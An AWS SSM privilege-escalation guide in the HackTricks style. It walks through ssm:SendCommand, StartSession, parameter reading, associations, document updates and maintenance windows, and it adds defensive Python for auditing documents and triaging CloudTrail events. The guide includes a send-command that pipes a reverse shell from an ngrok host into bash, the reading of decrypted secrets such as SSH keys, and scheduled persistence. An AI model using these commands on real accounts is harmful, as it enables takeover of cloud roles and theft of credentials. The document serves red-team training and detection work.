AWS - SSM Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

SSM

For more information about SSM check:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

ssm:SendCommand

An attacker with the ssm:SendCommand permission can execute commands in instances running the Amazon SSM Agent and compromise the IAM Role running inside it.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

If you are using this technique to escalate privileges inside an already compromised EC2 instance, you can just capture the rev shell locally with:

# If you are in the machine you can capture the reverse shell inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.

ssm:StartSession

An attacker with the ssm:StartSession permission can start an SSH-like session in instances running the Amazon SSM Agent and compromise the IAM Role running inside it.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Start an interactive session on the instance
aws ssm start-session --target "$INSTANCE_ID"

Caution

To start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.

Privesc to ECS

When ECS tasks are run with ExecuteCommand enabled, users with enough permissions can use ecs execute-command to execute a command inside the container.
According to the documentation this is done by creating a secure channel between the device you use to initiate the "exec" command and the target container using SSM Session Manager. (SSM Session Manager Plugin is required for this to work)
Therefore, users with ssm:StartSession will be able to get a shell inside ECS tasks with that option enabled by simply running:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Potential Impact: Direct privesc to the ECS IAM roles attached to running tasks with ExecuteCommand enabled.

ssm:ResumeSession

An attacker with the permission ssm:ResumeSession will be able to re-start an SSH-like session in instances running the Amazon SSM Agent with a disconnected SSM session state and compromise the IAM Role running inside it.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconnected sessions.

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

An attacker with the mentioned permissions is going to be able to list the SSM parameters and read them in clear-text. In these parameters you can frequently find sensitive information such as SSH keys or API keys.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Potential Impact: Find sensitive information inside the parameters.

ssm:ListCommands

An attacker with this permission can list all the commands sent and hopefully find sensitive information in them.

aws ssm list-commands

Potential Impact: Find sensitive information inside the command lines.

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

An attacker with these permissions can list all the commands sent and read the output generated, hopefully finding sensitive information in it.

# You can use either option to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Potential Impact: Find sensitive information inside the output of the command lines.

Using ssm:CreateAssociation

An attacker with the ssm:CreateAssociation permission can create a State Manager Association to automatically execute commands on EC2 instances managed by SSM. These associations can be configured to run at a fixed interval, making them useful for backdoor-like persistence without interactive sessions.

aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name

Note

This persistence technique works as long as the EC2 instance is managed by Systems Manager, the SSM agent is running, and the attacker has permission to create associations. It does not require interactive sessions or explicit ssm:SendCommand permissions. Important: the --schedule-expression parameter (e.g., rate(30 minutes)) must respect the AWS minimum interval of 30 minutes. For immediate or one-time execution, omit --schedule-expression entirely; the association will run once right after creation.

ssm:UpdateDocument, ssm:UpdateDocumentDefaultVersion, (ssm:ListDocuments | ssm:GetDocument)

An attacker with the ssm:UpdateDocument and ssm:UpdateDocumentDefaultVersion permissions can escalate privileges by modifying existing documents. This also allows persistence within that document. Realistically the attacker would also need ssm:ListDocuments to find the names of custom documents, and if the attacker wants to hide their payload inside an existing document, ssm:GetDocument would also be necessary.

aws ssm list-documents
aws ssm get-document --name "target-document" --document-format YAML
# You will need to specify the version you're updating
aws ssm update-document \
--name "target-document" \
--document-format YAML \
--content "file://doc.yaml" \
--document-version 1
aws ssm update-document-default-version --name "target-document" --document-version 2

Below is an example document that could be used to overwrite an existing document. You will want to make sure your document type matches the target's document type to avoid issues at invocation time. The document below, for example, will work with the ssm:SendCommand and ssm:CreateAssociation examples.

schemaVersion: '2.2'
description: Execute commands on a Linux instance.
parameters:
  commands:
    type: StringList
    description: "The commands to run."
    displayType: textarea
mainSteps:
  - action: aws:runShellScript
    name: runCommands
    inputs:
      runCommand:
        - "id > /tmp/pwn_test.txt"
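An added example (not part of the original page) that audits a Command document for the pattern shown above: a declared `commands` parameter that no step references, plus hard-coded runCommand lines that ignore caller input. It uses the JSON form of the document (SSM accepts JSON or YAML) so only the standard library is needed; both documents are constructed for this example.

```python
import json
import re

# Matches SSM parameter references such as {{ commands }} or {{commands}}.
PARAM_REF = re.compile(r"\{\{\s*(\w+)\s*\}\}")

# Constructed JSON form of the page's example document: it declares a "commands"
# parameter but the only step runs a fixed command, so caller input is ignored.
SUSPECT_DOC = json.dumps({
    "schemaVersion": "2.2",
    "description": "Execute commands on a Linux instance.",
    "parameters": {"commands": {"type": "StringList", "description": "The commands to run."}},
    "mainSteps": [{"action": "aws:runShellScript", "name": "runCommands",
                   "inputs": {"runCommand": ["id > /tmp/pwn_test.txt"]}}],
})

# Constructed document that passes the caller's parameter through, as AWS-RunShellScript does.
CLEAN_DOC = json.dumps({
    "schemaVersion": "2.2",
    "parameters": {"commands": {"type": "StringList"}},
    "mainSteps": [{"action": "aws:runShellScript", "name": "runCommands",
                   "inputs": {"runCommand": ["{{ commands }}"]}}],
})

def _strings(value):
    """Yield every string nested anywhere inside a parsed JSON value."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from _strings(v)

def audit_document(content):
    """Return a list of findings for an SSM Command document given as JSON text."""
    doc = json.loads(content)
    steps = doc.get("mainSteps", [])
    findings = []
    declared = set(doc.get("parameters", {}))
    referenced = {m for s in _strings(steps) for m in PARAM_REF.findall(s)}
    for name in sorted(declared - referenced):
        findings.append(f"parameter '{name}' is declared but no step references it")
    for step in steps:
        cmds = step.get("inputs", {}).get("runCommand", [])
        fixed = [c for c in cmds if not PARAM_REF.search(c)]
        if fixed:
            findings.append(f"step '{step.get('name')}' runs hard-coded commands: {fixed}")
    return findings
```

Run the check against `aws ssm get-document --document-format JSON` output for each custom document, and compare the default version with the version your deployment actually expects.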

ssm:RegisterTaskWithMaintenanceWindow, ssm:RegisterTargetWithMaintenanceWindow, (ssm:DescribeMaintenanceWindows | ec2:DescribeInstances)

An attacker with the ssm:RegisterTaskWithMaintenanceWindow and ssm:RegisterTargetWithMaintenanceWindow permissions can escalate privileges by first registering a new target with an existing maintenance window and then updating it by registering a new task. This results in execution on the existing targets, but may allow the attacker to compromise compute with different roles by registering new targets. This also allows persistence because maintenance window tasks run at the interval defined at window creation time. Realistically the attacker would also need ssm:DescribeMaintenanceWindows to find the maintenance window IDs.

aws ec2 describe-instances
aws ssm describe-maintenance-windows
aws ssm register-target-with-maintenance-window \
--window-id "<mw-id>" \
--resource-type "INSTANCE" \
--targets "Key=InstanceIds,Values=<instance_id>"
aws ssm register-task-with-maintenance-window \
--window-id "<mw-id>" \
--task-arn "AWS-RunShellScript" \
--task-type "RUN_COMMAND" \
--targets "Key=WindowTargetIds,Values=<target_id>" \
--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \
--max-concurrency 50 \
--max-errors 100
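An added detection example (not from the original page) in Python: it triages CloudTrail-style records for the SSM actions this page covers (SendCommand with AWS-RunShellScript, StartSession into an ECS task, scheduled CreateAssociation, UpdateDocumentDefaultVersion, RegisterTaskWithMaintenanceWindow, and GetParameter with decryption). The records are constructed, and the requestParameters key names (taken from the CLI flags above) are an assumption about the record layout.

```python
import re

# Event names are the SSM API/IAM action names; requestParameters keys mirror the
# CLI flags used on this page. The record layout is an assumption for this example.
def make_event(event_name, actor="arn:aws:iam::111122223333:user/dev", **params):
    return {"eventName": event_name, "eventSource": "ssm.amazonaws.com",
            "userIdentity": {"arn": actor}, "requestParameters": params}

# Constructed sample records, one per technique on this page plus a benign read.
SAMPLE_EVENTS = [
    make_event("DescribeInstanceInformation"),
    make_event("SendCommand", documentName="AWS-RunShellScript",
               instanceIds=["i-0123456789abcdef0"],
               parameters={"commands": ["curl https://example.invalid/x | bash"]}),
    make_event("StartSession", target="ecs:prod-cluster_abc123_def456"),
    make_event("CreateAssociation", name="AWS-RunShellScript",
               scheduleExpression="rate(30 minutes)"),
    make_event("UpdateDocumentDefaultVersion", name="target-document", documentVersion="2"),
    make_event("RegisterTaskWithMaintenanceWindow", windowId="mw-0123456789abcdef0",
               taskType="RUN_COMMAND"),
    make_event("GetParameter", name="id_rsa", withDecryption=True),
]

def classify(event):
    """Return a short finding for a suspicious SSM event, or None if it is benign."""
    name = event.get("eventName")
    p = event.get("requestParameters") or {}
    if name == "SendCommand" and p.get("documentName") == "AWS-RunShellScript":
        cmds = (p.get("parameters") or {}).get("commands", [])
        if any(re.search(r"\|\s*(ba)?sh\b", c) for c in cmds):
            return "SendCommand: remote content piped into a shell"
        return "SendCommand: ad-hoc shell script"
    if name == "StartSession":
        target = p.get("target", "")
        kind = "ECS task (execute-command)" if target.startswith("ecs:") else "instance"
        return f"StartSession to {kind} {target}"
    if name == "CreateAssociation" and p.get("scheduleExpression"):
        return f"CreateAssociation on schedule {p['scheduleExpression']} (possible persistence)"
    if name in ("UpdateDocument", "UpdateDocumentDefaultVersion"):
        return f"{name} on '{p.get('name')}' (document tampering)"
    if name in ("RegisterTaskWithMaintenanceWindow", "RegisterTargetWithMaintenanceWindow"):
        return f"{name} on {p.get('windowId')} (scheduled execution)"
    if name in ("GetParameter", "GetParameters") and p.get("withDecryption"):
        return f"{name} with decryption of '{p.get('name')}'"
    return None

def triage(events):
    """Return (actor, finding) pairs for every event that classify() flags."""
    return [(e["userIdentity"]["arn"], f) for e in events if (f := classify(e))]
```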

Codebuild

You can also use SSM to get inside a codebuild project being built:

AWS - Codebuild Privesc
